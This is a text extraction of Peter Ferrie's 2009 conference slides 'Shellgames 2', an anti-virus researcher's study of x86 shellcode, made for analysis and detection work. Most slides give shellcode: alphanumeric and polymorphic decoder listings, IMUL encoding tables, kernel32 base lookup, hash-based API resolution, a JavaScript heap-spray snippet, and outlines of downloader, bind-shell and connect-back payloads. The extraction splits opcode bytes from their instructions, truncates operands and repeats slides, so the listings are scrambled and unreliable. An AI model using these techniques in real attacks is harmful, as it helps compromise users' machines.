Shellgames - Peter Ferrie
Download
Report
Transcript Shellgames - Peter Ferrie
Shellgames 2
Peter Ferrie
Senior Anti-virus Researcher
19 February, 2009
1
Example Shellcode
Alphanumeric ASCII
Mixed-case
56
33
4E
6A
58
34
50
33
l1: 46
6B
32
30
75
45
PUSH
ESI
XOR
ESI, DWORD PTR SS:[ESP]
DEC
ESI
41
PUSH
+41
POP
EAX
65
XOR
AL, 65
PUSH
EAX
34 64
XOR
ESI, DWORD PTR SS:[ESP]
INC
ESI
44 71 65 30 IMUL
EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +30
44 71 66
XOR
AL, BYTE PTR DS:[ESI*2 + ECX + 66]
44 31 41
XOR
BYTE PTR DS:[ESI + ECX + 41], AL
[JNE
l1]
45
[encoded F0]
34 64
Peter Ferrie, Microsoft Corporation
2
Example Shellcode
Polymorphism
Mixed-case ASCII
54
54
51
51
52
6A
68
56
61
52
59
47
6A
58
52
34
48
43
34
30
l1: 58
52
51
50
50
5A
6A
58
34
43 4A 63 6A
53
53
7A
42 68
4E
Peter Ferrie, Microsoft Corporation
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
POPAD
PUSH
POP
INC
PUSH
POP
PUSH
XOR
DEC
INC
XOR
XOR
POP
PUSH
PUSH
PUSH
PUSH
POP
PUSH
POP
ESP
ESP
ECX
ECX
EDX
+34
6A634A43
ESI
EDX
ECX
EDI
+53
EAX
EDX
AL, 53
EAX
EBX
AL, 7A
BYTE PTR DS:[EDX + 68], AL
EAX
EDX
ECX
EAX
EAX
EDX
+4E
EAX
3
Example Shellcode
Polymorphism
Mixed-case ASCII (cont.)
34
50
32
30
58
32
30
58
59
5A
50
47
45
43
4C
44
48
47
4B
45
4F
4D
47
45
4D
48
4F
49
4E
42 54
42 54
41 69
42 54
Peter Ferrie, Microsoft Corporation
XOR
PUSH
XOR
XOR
POP
XOR
XOR
POP
POP
POP
PUSH
INC
INC
INC
DEC
INC
DEC
INC
DEC
INC
DEC
DEC
INC
INC
DEC
DEC
DEC
DEC
AL, 4E
EAX
AL, BYTE
BYTE PTR
EAX
AL, BYTE
BYTE PTR
EAX
ECX
EDX
EAX
EDI
EBP
EBX
ESP
ESP
EAX
EDI
EBX
EBP
EDI
EBP
EDI
EBP
EBP
EAX
EDI
ECX
PTR DS:[EDX + 54]
DS:[EDX + 54], AL
PTR DS:[ECX + 69]
DS:[EDX + 54], AL
4
Example Shellcode
Polymorphism
Mixed-case ASCII (cont.)
4D
4F
41
4F
47
6B
44
4C
41
33
32
30
41
42
45
39
75
41 6B 6F
41 69
42 69
42 69
34 6B
30
Peter Ferrie, Microsoft Corporation
DEC
DEC
INC
DEC
INC
IMUL
INC
DEC
INC
XOR
XOR
XOR
INC
INC
INC
CMP
[JNE
EBP
EDI
ECX
EDI
EDI
EAX, DWORD PTR DS:[ECX + 6B], +6F
ESP
ESP
ECX
EAX, DWORD PTR DS:[ECX + 69]
AL, BYTE PTR DS:[EDX + 69]
BYTE PTR DS:[EDX + 69], AL
ECX
EDX
EBP
DWORD PTR DS:[EBP*2 + EBX], ESI
l1]
5
Example Shellcode
Polymorphism
Mixed-case ASCII
55
50
51
51
55
6A
68
51
61
52
59
6A
58
34
43
52
47
48
34
30
l1: 58
52
51
50
50
5A
6A
58
34
42 4E 4D 31
45
45
7A
42 68
41
Peter Ferrie, Microsoft Corporation
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
POPAD
PUSH
POP
PUSH
POP
XOR
INC
PUSH
INC
DEC
XOR
XOR
POP
PUSH
PUSH
PUSH
PUSH
POP
PUSH
POP
EBP
EAX
ECX
ECX
EBP
+34
314D4E42
ECX
EDX
ECX
+45
EAX
AL, 45
EBX
EDX
EDI
EAX
AL, 7A
BYTE PTR DS:[EDX + 68], AL
EAX
EDX
ECX
EAX
EAX
EDX
+41
EAX
6
Example Shellcode
Polymorphism
Mixed-case ASCII (cont.)
34
50
32
30
58
32
30
58
59
5A
50
44
42
4B
4C
4C
4A
4A
41
4C
42
44
47
49
47
42
4A
44
41
42 55
42 55
41 6B
42 55
Peter Ferrie, Microsoft Corporation
XOR
PUSH
XOR
XOR
POP
XOR
XOR
POP
POP
POP
PUSH
INC
INC
DEC
DEC
DEC
DEC
DEC
INC
DEC
INC
INC
INC
DEC
INC
INC
DEC
INC
AL, 41
EAX
AL, BYTE
BYTE PTR
EAX
AL, BYTE
BYTE PTR
EAX
ECX
EDX
EAX
ESP
EDX
EBX
ESP
ESP
EDX
EDX
ECX
ESP
EDX
ESP
EDI
ECX
EDI
EDX
EDX
ESP
PTR DS:[EDX + 55]
DS:[EDX + 55], AL
PTR DS:[ECX + 6B]
DS:[EDX + 55], AL
7
Example Shellcode
Polymorphism
Mixed-case ASCII (cont.)
48
43
4C
48
4F
44
6B
47
41
33
32
30
41
42
45
39
75
41 69 52
41 69
42 69
42 69
34 6B
30
Peter Ferrie, Microsoft Corporation
DEC
INC
DEC
DEC
DEC
INC
IMUL
INC
INC
XOR
XOR
XOR
INC
INC
INC
CMP
[JNE
EAX
EBX
ESP
EAX
EDI
ESP
EAX, DWORD PTR DS:[ECX + 69], +52
EDI
ECX
EAX, DWORD PTR DS:[ECX + 69]
AL, BYTE PTR DS:[EDX + 69]
BYTE PTR DS:[EDX + 69], AL
ECX
EDX
EBP
DWORD PTR DS:[EBP*2 + EBX], ESI
l1]
8
Example Shellcode
Polymorphism
Mixed-case ASCII
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
POPAD
PUSH
POP
INC
PUSH
POP
PUSH
XOR
DEC
INC
XOR
XOR
l1: POP
PUSH
PUSH
PUSH
PUSH
POP
PUSH
POP
Peter Ferrie, Microsoft Corporation
ESP
ESP
ECX
ECX
EDX
+34
6A634A43
ESI
EDX
ECX
EDI
+53
EAX
EDX
AL, 53
EAX
EBX
AL, 7A
BYTE PTR DS:[EDX + 68], AL
EAX
EDX
ECX
EAX
EAX
EDX
+4E
EAX
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
POPAD
PUSH
POP
PUSH
POP
XOR
INC
PUSH
INC
DEC
XOR
XOR
POP
PUSH
PUSH
PUSH
PUSH
POP
PUSH
POP
EBP
EAX
ECX
ECX
EBP
+34
314D4E42
ECX
EDX
ECX
+45
EAX
AL, 45
EBX
EDX
EDI
EAX
AL, 7A
BYTE PTR DS:[EDX + 68], AL
EAX
EDX
ECX
EAX
EAX
EDX
+41
EAX
9
Example Shellcode
Polymorphism
Mixed-case ASCII (cont.)
XOR
PUSH
XOR
XOR
POP
XOR
XOR
POP
POP
POP
PUSH
INC
INC
INC
DEC
INC
DEC
INC
DEC
INC
DEC
DEC
INC
INC
DEC
DEC
DEC
DEC
Peter Ferrie, Microsoft Corporation
AL, 4E
EAX
AL, BYTE
BYTE PTR
EAX
AL, BYTE
BYTE PTR
EAX
ECX
EDX
EAX
EDI
EBP
EBX
ESP
ESP
EAX
EDI
EBX
EBP
EDI
EBP
EDI
EBP
EBP
EAX
EDI
ECX
PTR DS:[EDX + 54]
DS:[EDX + 54], AL
PTR DS:[ECX + 69]
DS:[EDX + 54], AL
XOR
PUSH
XOR
XOR
POP
XOR
XOR
POP
POP
POP
PUSH
INC
INC
DEC
DEC
DEC
DEC
DEC
INC
DEC
INC
INC
INC
DEC
INC
INC
DEC
INC
AL, 41
EAX
AL, BYTE
BYTE PTR
EAX
AL, BYTE
BYTE PTR
EAX
ECX
EDX
EAX
ESP
EDX
EBX
ESP
ESP
EDX
EDX
ECX
ESP
EDX
ESP
EDI
ECX
EDI
EDX
EDX
ESP
PTR DS:[EDX + 55]
DS:[EDX + 55], AL
PTR DS:[ECX + 6B]
DS:[EDX + 55], AL
10
Example Shellcode
Polymorphism
Mixed-case ASCII (cont.)
DEC
DEC
INC
DEC
INC
IMUL
INC
DEC
INC
XOR
XOR
XOR
INC
INC
INC
CMP
[JNE
Peter Ferrie, Microsoft Corporation
EBP
EDI
ECX
EDI
EDI
EAX, D DS:[ECX + 6B], +6F
ESP
ESP
ECX
EAX, DWORD PTR DS:[ECX + 69]
AL, BYTE PTR DS:[EDX + 69]
BYTE PTR DS:[EDX + 69], AL
ECX
EDX
EBP
D DS:[EBP*2 + EBX], ESI
l1]
DEC
INC
DEC
DEC
DEC
INC
IMUL
INC
INC
XOR
XOR
XOR
INC
INC
INC
CMP
[JNE
EAX
EBX
ESP
EAX
EDI
ESP
EAX, D DS:[ECX + 69], +52
EDI
ECX
EAX, DWORD PTR DS:[ECX + 69]
AL, BYTE PTR DS:[EDX + 69]
BYTE PTR DS:[EDX + 69], AL
ECX
EDX
EBP
D DS:[EBP*2 + EBX], ESI
l1]
11
Alphanumeric Decoders
Two major types
IMUL 10
IMUL 30
IMUL 10 is original, simplest, but larger
Precise bit control
Two nybbles – 4 bits and 4 bits
10 is not alphanumeric, must be constructed
IMUL 30 is smaller but harder to encode
XOR against original changes bit ratio
More like 3 bits and 5 bits
Obscure type: AAD
Peter Ferrie, Microsoft Corporation
12
IMUL 10 Decoding
Alphanumeric ASCII
Mixed-case
37
6A
58
50
30
l1: 41
6B
32
32
30
41
42
58
50
38
75
4A
AAA * 25
PUSH
+41
POP
EAX
PUSH
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
INC
ECX
41 41 51 IMUL
EAX, DWORD PTR DS:[ECX + 41], +51
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
INC
ECX
INC
EDX
POP
EAX
PUSH
EAX
41 42
CMP
BYTE PTR DS:[ECX + 42], AL
[JNE
l1]
49
[encoded E9]
41
Peter Ferrie, Microsoft Corporation
13
IMUL 10 Decoding
Alphanumeric ASCII
Mixed-case
37
6A
58
50
30
l1: 41
6B
32
32
30
41
42
58
50
38
75
4A
AAA * 25
PUSH
+41
POP
EAX
PUSH
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
INC
ECX
41 41 51 IMUL
EAX, DWORD PTR DS:[ECX + 41], +51
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
INC
ECX
INC
EDX
POP
EAX
PUSH
EAX
41 42
CMP
BYTE PTR DS:[ECX + 42], AL
[JNE
l1]
49
[encoded E9]
41
Peter Ferrie, Microsoft Corporation
14
IMUL 10 Decoding
Alphanumeric ASCII
Mixed-case
37
6A
58
50
30
l1: 41
6B
32
32
30
41
42
58
50
38
75
4A
AAA * 25
PUSH
+41
POP
EAX
PUSH
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
INC
ECX
41 41 51 IMUL
EAX, DWORD PTR DS:[ECX + 41], +51
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
INC
ECX
INC
EDX
POP
EAX
PUSH
EAX
41 42
CMP
BYTE PTR DS:[ECX + 42], AL
[JNE
l1]
49
[encoded E9]
41
Peter Ferrie, Microsoft Corporation
15
IMUL 10 Decoding
Alphanumeric ASCII
Mixed-case
37
6A
58
50
30
l1: 41
6B
32
32
30
41
42
58
50
38
75
4A
AAA * 25
PUSH
+41
POP
EAX
PUSH
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
INC
ECX
41 41 10 IMUL
EAX, DWORD PTR DS:[ECX + 41], +10
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
INC
ECX
INC
EDX
POP
EAX
PUSH
EAX
41 42
CMP
BYTE PTR DS:[ECX + 42], AL
[JNE
l1]
49
[encoded E9]
41
Peter Ferrie, Microsoft Corporation
16
IMUL 10 Decoding
Alphanumeric ASCII
Mixed-case
Decode E9
IMUL
4A * 10 =
XOR
A0 ^ 49 =
XOR
E9 ^ 4A =
XOR
A3 ^ 4A =
using 4A and 49
EAX, DWORD PTR DS:[ECX + 41], +10
[4]A0
AL, BYTE PTR DS:[ECX + 42]
E9
AL, BYTE PTR DS:[EDX + 42]
A3
BYTE PTR DS:[EDX + 42], AL
E9
Peter Ferrie, Microsoft Corporation
17
IMUL 10 Encoding
Given a value: E9
Start with low nybble (9)
Encode as ASCII (39/49/59/69/79)
Xor high nybble of decoded value (E) and encoded values
E^3=D
E^4=A
E^5=B
E^6=8
E^7=9
Encode as ASCII (3D/4D/5D/6D/7D or 3A/4A/5A/6A/7A, etc)
Exclude illegal candidates (3D, 7D, 3A, etc)
Pick a pair, big-endian order (4A, 49)
Peter Ferrie, Microsoft Corporation
18
IMUL 30 Decoding
Alphanumeric ASCII
Mixed-case IMUL 30
56
33
4E
6A
58
34
50
33
l1: 46
6B
32
30
75
45
PUSH
ESI
XOR
ESI, DWORD PTR SS:[ESP]
DEC
ESI
41
PUSH
+41
POP
EAX
65
XOR
AL, 65
PUSH
EAX
34 64
XOR
ESI, DWORD PTR SS:[ESP]
INC
ESI
44 71 65 30 IMUL
EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +30
44 71 66
XOR
AL, BYTE PTR DS:[ESI*2 + ECX + 66]
44 31 41
XOR
BYTE PTR DS:[ESI + ECX + 41], AL
[JNE
l1]
45
[encoded F0]
34 64
Peter Ferrie, Microsoft Corporation
19
IMUL 30 Decoding
Alphanumeric ASCII
Mixed-case IMUL 30
56
33
4E
6A
58
34
50
33
l1: 46
6B
32
30
75
45
PUSH
ESI
XOR
ESI, DWORD PTR SS:[ESP]
DEC
ESI
41
PUSH
+41
POP
EAX
65
XOR
AL, 65
PUSH
EAX
34 64
XOR
ESI, DWORD PTR SS:[ESP]
INC
ESI
44 71 65 30 IMUL
EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +30
44 71 66
XOR
AL, BYTE PTR DS:[ESI*2 + ECX + 66]
44 31 41
XOR
BYTE PTR DS:[ESI + ECX + 41], AL
[JNE
l1]
45
[encoded F0]
34 64
Peter Ferrie, Microsoft Corporation
20
IMUL 30 Decoding
Alphanumeric ASCII
Mixed-case IMUL 30
Decode F0
IMUL
45 * 30 =
XOR
F0 ^ 45 =
XOR
B5 ^ 45 =
using 45 and 45
EAX, DWORD PTR DS:[ESI*2 + ECX + 65], +30
[C]F0
AL, BYTE PTR DS:[ESI*2 + ECX + 66]
B5
BYTE PTR DS:[ESI + ECX + 41], AL
F0
Peter Ferrie, Microsoft Corporation
21
IMUL 30 Encoding
Given a value: F8
Start with the high nybble (F)
Use table lookup
0 -> 0 (0 * 30 = [0]00)
8 -> 8 (8 * 30 = [1]80)
1 -> B (B * 30 = [2]10)
9 -> 3 (3 * 30 = [0]90)
2 -> 6 (6 * 30 = [1]20)
A -> E (E * 30 = [2]A0)
3 -> 1 (1 * 30 = [0]30)
B -> 9 (9 * 30 = [1]B0)
4 -> C (C * 30 = [2]40)
C -> 4 (4 * 30 = [0]C0)
5 -> 7 (7 * 30 = [1]50)
D -> F (F * 30 = [2]D0)
6 -> 2 (2 * 30 = [0]60)
E -> A (A * 30 = [1]E0)
7 -> D (D * 30 = [2]70)
F -> 5 (5 * 30 = [0]F0)
Encode as ASCII (35/45/55/65/75)
Peter Ferrie, Microsoft Corporation
22
IMUL 30 Encoding
Xor low nybble (8) and encoded values
08 ^ 35 = 3D
08 ^ 45 = 4D
08 ^ 55 = 5D
08 ^ 65 = 6D
08 ^ 75 = 7D
Exclude illegal candidates (3D, 5D, 7D)
Pick a pair, big-endian order (45, 4D)
Peter Ferrie, Microsoft Corporation
23
IMUL 10 Decoding
Alphanumeric ASCII
Upper-case IMUL 10
37
56
54
58
33
56
58
34
50
30
48
48
30
30
l1: 41
41
42
54
32
32
30
58
50
38
4A
4A
AAA * 12
PUSH
ESI
PUSH
ESP
POP
EAX
30
XOR
ESI, DWORD PTR DS:[EAX]
PUSH
ESI
POP
EAX
41
XOR
AL, 41
PUSH
EAX
41 33
XOR
BYTE PTR DS:[ECX + 33], AL
DEC
EAX
DEC
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
41 42
XOR
BYTE PTR DS:[ECX + 42], AL
INC
ECX
INC
ECX
INC
EDX
41 41 51 [IMUL
EAX, DWORD PTR DS:[ECX + 41], +10]
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
POP
EAX
PUSH
EAX
41 43
CMP
BYTE PTR DS:[ECX + 43], AL
[JNE
l1]
49
[encoded E9]
Peter Ferrie, Microsoft Corporation
24
IMUL 10 Decoding
Alphanumeric ASCII
Upper-case IMUL 10
37
56
54
58
33
56
58
34
50
30
48
48
30
30
l1: 41
41
42
54
32
32
30
58
50
38
4A
4A
AAA * 12
PUSH
ESI
PUSH
ESP
POP
EAX
30
XOR
ESI, DWORD PTR DS:[EAX]
PUSH
ESI
POP
EAX
41
XOR
AL, 41
PUSH
EAX
41 33
XOR
BYTE PTR DS:[ECX + 33], AL
DEC
EAX
DEC
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
41 42
XOR
BYTE PTR DS:[ECX + 42], AL
INC
ECX
INC
ECX
INC
EDX
41 41 51 [IMUL
EAX, DWORD PTR DS:[ECX + 41], +10]
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
POP
EAX
PUSH
EAX
41 43
CMP
BYTE PTR DS:[ECX + 43], AL
[JNE
l1]
49
[encoded E9]
Peter Ferrie, Microsoft Corporation
25
IMUL 10 Decoding
Alphanumeric ASCII
Upper-case IMUL 10
37
56
54
58
33
56
58
34
50
30
48
48
30
30
l1: 41
41
42
54
32
32
30
58
50
38
4A
4A
AAA * 12
PUSH
ESI
PUSH
ESP
POP
EAX
30
XOR
ESI, DWORD PTR DS:[EAX]
PUSH
ESI
POP
EAX
41
XOR
AL, 41
PUSH
EAX
41 33
XOR
BYTE PTR DS:[ECX + 33], AL
DEC
EAX
DEC
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
41 42
XOR
BYTE PTR DS:[ECX + 42], AL
INC
ECX
INC
ECX
INC
EDX
41 41 51 [IMUL
EAX, DWORD PTR DS:[ECX + 41], +10]
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
POP
EAX
PUSH
EAX
41 43
CMP
BYTE PTR DS:[ECX + 43], AL
[JNE
l1]
49
[encoded E9]
Peter Ferrie, Microsoft Corporation
26
IMUL 10 Decoding
Alphanumeric ASCII
Upper-case IMUL 10
37
56
54
58
33
56
58
34
50
30
48
48
30
30
l1: 41
41
42
54
32
32
30
58
50
38
4A
4A
AAA * 12
PUSH
ESI
PUSH
ESP
POP
EAX
30
XOR
ESI, DWORD PTR DS:[EAX]
PUSH
ESI
POP
EAX
41
XOR
AL, 41
PUSH
EAX
41 33
XOR
BYTE PTR DS:[ECX + 33], AL
DEC
EAX
DEC
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
41 42
XOR
BYTE PTR DS:[ECX + 42], AL
INC
ECX
INC
ECX
INC
EDX
41 41 51 [IMUL
EAX, DWORD PTR DS:[ECX + 41], +10]
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
POP
EAX
PUSH
EAX
41 43
CMP
BYTE PTR DS:[ECX + 43], AL
[JNE
l1]
49
[encoded E9]
Peter Ferrie, Microsoft Corporation
27
IMUL 10 Decoding
Alphanumeric ASCII
Upper-case IMUL 10
37
56
54
58
33
56
58
34
50
30
48
48
30
30
l1: 41
41
42
54
32
32
30
58
50
38
4A
4A
AAA * 12
PUSH
ESI
PUSH
ESP
POP
EAX
30
XOR
ESI, DWORD PTR DS:[EAX]
PUSH
ESI
POP
EAX
41
XOR
AL, 41
PUSH
EAX
41 33
XOR
BYTE PTR DS:[ECX + 33], AL
DEC
EAX
DEC
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
41 42
XOR
BYTE PTR DS:[ECX + 42], AL
INC
ECX
INC
ECX
INC
EDX
41 41 51 [IMUL
EAX, DWORD PTR DS:[ECX + 41], +10]
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
POP
EAX
PUSH
EAX
41 43
CMP
BYTE PTR DS:[ECX + 43], AL
[JNE
l1]
49
[encoded E9]
Peter Ferrie, Microsoft Corporation
28
IMUL 10 Decoding
Alphanumeric ASCII
Upper-case IMUL 10
37
56
54
58
33
56
58
34
50
30
48
48
30
30
l1: 41
41
42
54
32
32
30
58
50
38
4A
4A
AAA * 12
PUSH
ESI
PUSH
ESP
POP
EAX
30
XOR
ESI, DWORD PTR DS:[EAX]
PUSH
ESI
POP
EAX
41
XOR
AL, 41
PUSH
EAX
41 33
XOR
BYTE PTR DS:[ECX + 33], AL
DEC
EAX
DEC
EAX
41 30
XOR
BYTE PTR DS:[ECX + 30], AL
41 42
XOR
BYTE PTR DS:[ECX + 42], AL
INC
ECX
INC
ECX
INC
EDX
41 41 51 [IMUL
EAX, DWORD PTR DS:[ECX + 41], +10]
41 42
XOR
AL, BYTE PTR DS:[ECX + 42]
42 42
XOR
AL, BYTE PTR DS:[EDX + 42]
42 42
XOR
BYTE PTR DS:[EDX + 42], AL
POP
EAX
PUSH
EAX
41 43
CMP
BYTE PTR DS:[ECX + 43], AL
[JNE
l1]
49
[encoded E9]
Peter Ferrie, Microsoft Corporation
29
Other Decoders
AAD
Combines MUL and ADD (instead of XOR) in one instruction
Little-endian ordering
Never seen outside (so far)
AX = [word]
AAD 30 (or 10)
[byte] = AL
Peter Ferrie, Microsoft Corporation
30
Other Decoders
Base64
l1:
l2:
l3:
l4:
AD
6A
59
C1
3C
73
04
C0
04
3C
76
2C
3C
76
2C
0F
E2
93
0F
AB
4F
80
75
04
C0 08
30
05
BD
E8 02
04
3F
08
45
19
02
06
AC C3 06
E0
C8
3E 20
D2
Peter Ferrie, Microsoft Corporation
LODS
PUSH
POP
ROL
CMP
JNB
ADD
SHR
ADD
CMP
JBE
SUB
CMP
JBE
SUB
SHRD
LOOPD
XCHG
BSWAP
STOS
DEC
CMP
JNE
DWORD PTR DS:[ESI]
+04
ECX
EAX, 08
AL, 30
l3
AL, BD
AL, 02
AL, 04
AL, 3F
l4
AL, 45
AL, 19
l4
AL, 06
EBX, EAX, 06
l2
EBX, EAX
EAX
DWORD PTR ES:[EDI]
EDI
BYTE PTR DS:[ESI], 20
l1
31
Other Decoders
Base64 (alternative)
l1:
l2:
l3:
l4:
AD
4F
6A
59
C1
3C
73
04
C0
04
3C
76
2C
3C
76
2C
0F
E2
93
0F
AB
75
04
C0 08
30
05
BD
E8 02
04
3F
08
45
19
02
06
AC C3 06
E0
C8
D5
Peter Ferrie, Microsoft Corporation
LODS
DEC
PUSH
POP
ROL
CMP
JNB
ADD
SHR
ADD
CMP
JBE
SUB
CMP
JBE
SUB
SHRD
LOOPD
XCHG
BSWAP
STOS
JNE
DWORD PTR DS:[ESI]
EDI
+04
ECX
EAX, 08
AL, 30
l3
AL, BD
AL, 02
AL, 04
AL, 3F
l4
AL, 45
AL, 19
l4
AL, 06
EBX, EAX, 06
l2
EBX, EAX
EAX
DWORD PTR ES:[EDI]
l1
32
Next Steps
Finding the kernel32 base
SEH walker
33
64
40
l1: 48
96
AD
40
75
AD
97
l2: 4F
66
66
75
8B
81
75
F6
AD
FA
33
81
F5
47
3C
E9
FF
3F 4D 5A
3C
07 50 45 00 00
XOR
LODS
INC
DEC
XCHG
LODS
INC
JNE
LODS
XCHG
DEC
XOR
CMP
JNE
MOV
CMP
JNE
ESI, ESI
DWORD PTR FS:[ESI]
EAX
EAX
ESI, EAX
DWORD PTR DS:[ESI]
EAX
l1
DWORD PTR DS:[ESI]
EDI, EAX
EDI
DI, DI
WORD PTR DS:[EDI], 5A4D
l2
EAX, DWORD PTR DS:[EDI + 3C]
DWORD PTR DS:[EAX + EDI], 00004550
l2
MOV
MOV
MOV
LODS
MOV
EAX, DWORD PTR FS:[0030]
EDI, DWORD PTR DS:[EAX + 0C]
ESI, DWORD PTR DS:[EDI + 1C]
DWORD PTR DS:[ESI]
EDI, DWORD PTR DS:[EAX + 08]
LDR_DATA_TABLE_ENTRY
64
8B
8B
AD
8B
67 A1 30 00
78 0C
77 1C
78 08
Peter Ferrie, Microsoft Corporation
33
Next Steps
API resolution
String compare
33
l1: 45
8B
81
75
8B
03
03
ED
14
3C
F3
74
F7
3C
AB
3A 57 69 6E 45
3E 1C
AE
Peter Ferrie, Microsoft Corporation
XOR
INC
MOV
CMP
JNE
MOV
ADD
ADD
EBP, EBP
EBP
EDX, DWORD PTR SS:[EBP*4 + EBX]
DWORD PTR DS:[EDI + EDX], "EniW"
l1
ESI, DWORD PTR DS:[EDI + ESI + 1C]
ESI, EDI
EDI, DWORD PTR DS:[EBP*4 + ESI]
34
Next Steps
API resolution
Hashing
33
53
49
l1: 41
AD
5B
03
53
33
l2: 0F
3A
74
C1
03
40
EB
l3: 3B
75
5A
5E
8B
03
66
8B
03
8B
03
C9
C3
DB
BE 10
D6
08
CB 07
DA
F1
1F
E5
5E
DA
8B
5E
DA
04
C2
24
0C 4B
1C
8B
Peter Ferrie, Microsoft Corporation
XOR
PUSH
DEC
INC
LODS
POP
ADD
PUSH
XOR
MOVSX
CMP
JE
ROR
ADD
INC
JMP SHORT
CMP
JNE
POP
POP
MOV
ADD
MOV
MOV
ADD
MOV
ADD
ECX, ECX
EBX
ECX
ECX
DWORD PTR DS:[ESI]
EBX
EAX, EBX
EBX
EBX, EBX
EDX, BYTE PTR DS:[EAX]
DL, DH
l3
EBX, 07
EBX, EDX
EAX
l2
EBX, DWORD PTR DS:[EDI]
l1
EDX
ESI
EBX, DWORD PTR DS:[ESI +
EBX, EDX
CX, WORD PTR DS:[ECX*2 +
EBX, DWORD PTR DS:[ESI +
EBX, EDX
EAX, DWORD PTR DS:[ECX*4
EAX, EDX
24]
EBX]
1C]
+ EBX]
35
Next Steps
API resolution
Hashing
33
53
49
l1: 41
AD
5B
03
53
33
l2: 0F
3A
74
C1
03
40
EB
l3: 3B
75
5A
5E
8B
03
66
8B
03
8B
03
C9
C3
DB
BE 10
D6
08
CB 07
DA
F1
1F
E5
5E
DA
8B
5E
DA
04
C2
24
0C 4B
1C
8B
Peter Ferrie, Microsoft Corporation
XOR
PUSH
DEC
INC
LODS
POP
ADD
PUSH
XOR
MOVSX
CMP
JE
ROR
ADD
INC
JMP SHORT
CMP
JNE
POP
POP
MOV
ADD
MOV
MOV
ADD
MOV
ADD
ECX, ECX
EBX
ECX
ECX
DWORD PTR DS:[ESI]
EBX
EAX, EBX
EBX
EBX, EBX
EDX, BYTE PTR DS:[EAX]
DL, DH
l3
EBX, 07
EBX, EDX
EAX
l2
EBX, DWORD PTR DS:[EDI]
l1
EDX
ESI
EBX, DWORD PTR DS:[ESI +
EBX, EDX
CX, WORD PTR DS:[ECX*2 +
EBX, DWORD PTR DS:[ESI +
EBX, EDX
EAX, DWORD PTR DS:[ECX*4
EAX, EDX
24]
EBX]
1C]
+ EBX]
36
Next Steps
Downloader
Urlmon!UrlDownloadToFileA
Kernel32!WinExec
Backdoor
Bind-shell
Ws2_32!WSASocketA, bind, listen, accept
Kernel32!CreateProcess hStdInput = hStdOutput = socket
Connect-back
Ws2_32!WSASocketA, connect
Kernel32!CreateProcess hStdInput = hStdOutput = socket
http
Kernel32!CreateProcessA(iexplore.exe)
Peter Ferrie, Microsoft Corporation
37
Special Cases
Office
Loading the second stage
File handle
Stream handle
Stealth
Repair
Replace
Scripts
Heap spray
block = unescape("%u0c0c%u0c0c")
nops = unescape("%u9090%u9090%u9090")
while (block.length < 81920) block += block
memory = new Array()
for (i=0;i<1000;i++) memory[i] += (block + nops + shellcode)
Miscellaneous
NOP-sleds
Peter Ferrie, Microsoft Corporation
38
Visualisation
Spot the shellcode
Peter Ferrie, Microsoft Corporation
39
Visualisation
Spot the shellcode
Peter Ferrie, Microsoft Corporation
40
Visualisation
Certain common characters
90 (capital e-acute)
E8 (capital phi)
E9 (capital theta)
EB (small delta)
Peter Ferrie, Microsoft Corporation
41
ASCII Art
Shark
VTX30VXH4r4PP34tjAX0DqbFkDqjQ2Dqk0D1Hu9YzttKUF8y6R4VkZ6tWH6jsrCwNOs0nrgVN8akdI4JPzWplKQQnVM47JnyDp
DD
MJ
GE
IL
HB
_,,
,dY
DA
IL
,iHGY
dAM;
IL
HG
sBMKY'
dNI:'
LG
IA
sIGKG1
fEGY?
IC
AE
dBGDGN;
fGI"
FJ
ND
dGCDAIL'
fPE:
LF
AC
dCLOBJJG;
fGL:
KD
DD
.dCFCGIHHHD
.
fDCl`
FP
CL
,sOBNGILPMPDKK w,_
.sEB
,FBEl;
BF
BF
_.,sHFB*"'*" , FHI' NHOOm mu,,._ .iKLAIb, ,BD*MN!:
DH
FA
_,s YGJFP'',sd,'PF HPMi "*JF* FHGAILb FND MIY`,LF' MB!`
NH
IA
_,os,'DNi YN' m,'IL; ELb`CAA 7m,, DMN lDD PPJJY* EHi IL!.
DE
LJ
